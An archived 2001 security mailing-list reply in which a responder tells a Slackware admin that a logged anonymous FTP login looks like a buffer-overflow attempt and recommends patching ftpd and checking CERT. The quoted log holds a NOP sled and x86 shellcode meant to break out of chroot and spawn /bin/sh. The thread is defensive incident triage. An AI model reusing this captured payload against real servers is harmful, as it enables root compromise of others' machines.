Re: Linux ftpd

From: Sam Mingolelli (samat_private)
Date: Sat Jun 09 2001 - 09:23:56 PDT

  • Next message: centipede: "Re: Linux ftpd"

    This looks like a buffer overflow attack to me. I would make sure that
    you have the latest patches etc. applied to ftpd. 
    
    You can browse thru the CERT dbs to see if any info has been posted
    regarding this.
    
    http://search.cert.org/query.html?rq=0&col=allcert&ht=0&qp=&qs=&qc=&pw=100%25&ws=1&la=&qm=0&st=1&nh=25&lk=1&rf=2&oq=&rq=0&si=1&qt=ftpd
    
    
    * mrcbisat_private <mrcbisat_private> [010609 12:12]:
    
    > 
    > I have a linux-box running slackware 7.1 with kernel 2.2.18 acting as
    > office-server; we have an internet-connection in dial-up to an ISP near us.
    > Today I was looking into log-files, I found, in /var/log/messages the
    > following message:
    > Jun  3 21:30:05 sassuolo ftpd[24355]: ANONYMOUS FTP LOGIN FROM
    > 202.239.131.55 [2
    > 02.239.131.55],
    > <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
    > <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
    > ><90>
    > <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
    > ><90>
    > <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
    > ><90>
    > <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
    > ><90>
    > <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
    > ><90>
    > <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
    > ><90>
    > <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
    > ><90>
    > <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
    > ><90>
    > <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
    > ><90>
    > <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
    > ><90>
    > <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
    > ><90>
    > <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
    > ><90>
    > <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
    > ><90>
    > <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
    > ><90>
    > <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
    > ><90>
    > <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
    > ><90>
    > <90><90><90><90><90><90><90><90><90><90><90>1<C0>1<DB>1<C9><B0>F<CD><80>1<C
    > 0>1
    > <DB>C<89><D9>A<B0>?<CD><80><EB>k^1<C0>1<C9><8D>^^A<88>F^Df<B9><FF>^A<B0>'<C
    > D>
    > <80>1<C0><8D>^^A<B0>=<CD><80>1<C0>1<DB><8D>^^H<89>C^B1<C9><FE><C9>1<C0><8
    > D>^^H
    > <B0>^L<CD><80><FE><C9>u<F3>1<C0><88>F^I<8D>^^H<B0>=<CD><80><FE>^N<B0>0<FE
    > ><C8>
    > <88>F^D1<C0><88>F^G<89>v^H<89>F^L<89><F3><8D>N^H<8D>V^L<B0>^K<CD><80>1<C0>1
    > <DB>
    > <B0>^A<CD><80><E8><90><FF><FF><FF>0bin0sh1..11
    > 
    > 
    > repeated twice within few minutes. I think it was an intrusion attempt. My
    > linux-box is connected to the internet with dynamic-ip-address. Can
    > someone help me ? 
    > Best regards
    > 
    > 
    > 						Marco Bisio
    
    -- 
                      \|/                                                                 
                      @-@                                                                 
    ------------ooO---(_)--Ooo----------------                                            
    | E-Mail:                                                                             
    |        (H):    slmingolat_private                                                
    |        (W):    sam.mingoat_private                                                
    |                                                                                     
    | web:           http://bubs.dnsq.org/~sam/
    



    This archive was generated by hypermail 2b30 : Sat Jun 09 2001 - 09:43:06 PDT